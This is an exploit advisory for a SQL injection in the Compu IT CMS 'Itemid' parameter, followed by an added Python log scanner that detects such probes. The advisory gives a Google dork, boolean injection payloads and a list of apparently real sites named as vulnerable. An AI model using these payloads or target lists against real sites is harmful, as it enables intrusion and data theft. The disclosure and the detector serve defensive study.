Compu IT CMS SQL Injection Vulnerability

2013.07.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#######################################################
#
# [+] Exploit Title: Compu IT CMS SQL Injection Vulnerability
# [+] Google Dork: intext:"Developed by: Compu IT"
# [+] Date: 29-07-2013
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Home: http://wWw.IDC-TeaM.NeT
# [+] Discovered By : Black.Hack3r
# [+] Category: WebApp,Remote
# [+] Vendor Homepage: http://www.compuitgh.com
# [+] Tested on: Windows 7
#
#######################################################
#
# [+] Exploit:
#
# [+] http://localhost/[path]/index.php?opt=contents&Itemid=[SQLi]
#
#######################################################
#
# [+] Proof:
# [+] http://localhost/[path]/index.php?opt=contents&Itemid=3+and+1=1-- >> True
# [+] http://localhost/[path]/index.php?opt=contents&Itemid=3+and+1=2-- >> False
#
#######################################################
#
# [+] For example :
#
# [+] http://www.comXuitgh.com/index.php?opt=contents&Itemid=3
# [+] http://www.ddpXdoor.com/index.php?opt=contents&Itemid=1
# [+] http://infoXspr.org/index.php?opt=contents&Itemid=8
# [+] http://www.sXenghanacancerfoundation.com/index.php?opt=contents&Itemid=3
# [+] http://www.sgXcltd.com/index.php?opt=contents&Itemid=3
# [+] http://www.X.com/index.php?opt=contents&Itemid=2
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313
# [+] SpTnx : Mr.Cicili,Sec4ever,shahram black hat,C@M!S3Я_H3X,@3is,HOt0N,All Members In wWw.IDC-TeaM.neT/cc
# [+] Home : http://wWw.IDC-TeaM.neT
#
#######################################################
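
For defenders checking web server logs for the kind of request shown under Proof, here is an added example (not part of the original advisory and not the vendor's code) that flags requests to index.php?opt=contents whose Itemid is not a plain integer. The combined log format, the sample lines and the integer-only rule for Itemid are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jul/2013:10:00:01 +0000] "GET /index.php?opt=contents&Itemid=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [29/Jul/2013:10:00:07 +0000] "GET /index.php?opt=contents&Itemid=3+and+1=1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [29/Jul/2013:10:00:08 +0000] "GET /index.php?opt=contents&Itemid=3%20and%201%3D2-- HTTP/1.1" 200 1480 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Jul/2013:10:01:00 +0000] "GET /cms/index.php?opt=news&Itemid=abc HTTP/1.1" 200 900 "-" "curl/7.30"
203.0.113.7 - - [29/Jul/2013:10:02:00 +0000] "GET /index.php?opt=contents&Itemid=8&Itemid=8'-- HTTP/1.1" 500 0 "-" "curl/7.30"
"""

# Captures: client IP, timestamp, method, request target, status, response size.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')
INT_RE = re.compile(r"\d{1,10}")  # assumption: a legitimate Itemid is a plain integer

def suspicious_itemid_requests(log_text):
    """Return requests to index.php?opt=contents whose Itemid is not an integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, _method, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs undoes %XX and '+' encoding, so both spellings look alike.
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("opt", [""])[-1] != "contents":
            continue
        # Check every repeated Itemid, not just the first one.
        bad = [v for v in params.get("Itemid", []) if not INT_RE.fullmatch(v)]
        if bad:
            findings.append({"ip": ip, "time": ts, "status": int(status),
                             "size": size, "values": bad})
    return findings

def boolean_probe_suspects(findings):
    """Clients with 2+ flagged requests that got different response sizes,
    the pattern a true/false test such as the advisory's proof leaves behind."""
    sizes = {}
    for f in findings:
        sizes.setdefault(f["ip"], []).append(f["size"])
    return sorted(ip for ip, s in sizes.items() if len(s) >= 2 and len(set(s)) >= 2)

if __name__ == "__main__":
    for f in suspicious_itemid_requests(SAMPLE_LOG):
        print(f["ip"], f["time"], f["status"], f["values"])
```

The same integer-only check, applied in the application before Itemid reaches the database and combined with a parameterized query, is the CWE-89 remediation.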

References:

http://www.compuitgh.com

